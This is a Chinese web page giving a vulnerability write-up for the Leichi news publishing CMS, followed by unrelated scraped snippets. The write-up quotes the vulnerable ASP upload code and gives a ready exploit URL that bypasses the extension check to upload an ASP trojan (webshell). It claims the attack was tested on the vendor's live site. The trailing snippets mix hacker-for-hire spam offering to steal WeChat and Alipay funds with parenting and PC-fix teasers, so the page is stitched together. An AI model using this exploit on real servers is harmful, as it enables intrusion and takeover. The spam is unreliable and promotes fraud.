声明:漏洞为focn[BCT]首先发现,版权归漏洞发现者focn所有,转载请保持文章完整,并注明出处!本文章只做学习研究用,任何人用于其他非法用途本人不承担任何责任! 作者:黑萝卜系统: 雷驰新闻发布管理系统版本: 当前任何版本漏洞描述:1 在admin文件夹下的uploadPic.inc.asp中,没有对访问权限进行限制,任意用户都可 以 访问到此文件。任意用户都可以使用此文件上传文件到服务器 2 uploadPic.inc.asp中虽然对上传文件的后缀名进行了限制但是可以绕过。请看代码! if file.FileSize>0 then ''如果 FileSize > 0 说明有文件数据 '生成图片名字 if actionType= "mod" then remFileName = Right(picName,len(picName)-InstrRev(picName,"/")) else if editRemNum<>"" then remNum = editRemNum else Randomize remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time) end if remFileName = remNum&"_"&(editImageNum+1)&".gif" end if file.SaveAs Server.mappath(formPath&remFileName) ''保存文件 %> 关键的是 if actionType= "mod" then remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))只要自己构造actionType= "mod" 就可以饶过下面的文件名检测上传ASP文件构造如下UPLhttp://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp然后在上传文件里面填要传的图片格式的ASP木马就可以在uppic目录下上传文件名为test.asp的文件 本 *** 在雷驰官方网站上测试通过!·再次希望大家不要用于非法用途!!
一、一个帮助怎么找黑客 1、方木盘黑客网脚本儿童指出,根据指示或操作某些令人震惊的程序,完全没有或根本没有可怕的技能的人,他们热衷于研究和撰写程序,必须有乐趣。一个帮助免费盗微信支付宝的钱但这不是真正...
在小孩的记忆里,母亲一直低声下气子,让我们弄各种各样美味的,便是期待大家健康快乐的,消化吸收大量的营养成分,好好地长大了。在中国台湾,小孩的白米饭中,母亲总喜爱拌入鱼松给孩子服用,其美味可口与营养成分...
一、软件ip怎么找黑客 1、找网接单黑客胡说八道。软件ip破解版王者荣耀下载一般来说,每个端口的开放对应于相应的服务以关闭这些端口。关闭相应的服务。找黑客网他用工作挣来的钱买了一台性能好的电脑。 2...
大家好,我是儿科医生靳晓利,很开心加入到“医知袋鼠”(jjkkczj)的科普医生团队,能够利用医知袋鼠这个平台与大家分享科普知识。 天气越来越冷,早晚温差越来越大,很多宝宝没能经受住考验,开始流鼻涕...
应用电脑浏览器网上时,提醒网站安全性证书过期该怎么办?此网站的安全证书过期或还未起效该如何解决?下边就给大伙儿共享电脑浏览器一直提醒网站安全性证书过期的解决方案。 1、按Win R键,打开运...
相信不少Lantern用户会遇到:不打开Lantern无法连接到互联网,QQ却可以登录,浏览器上网时报错等问题。其实这是由于Lantern未完全退出导致。下面教大家如何解决。 1、Win+R键入re...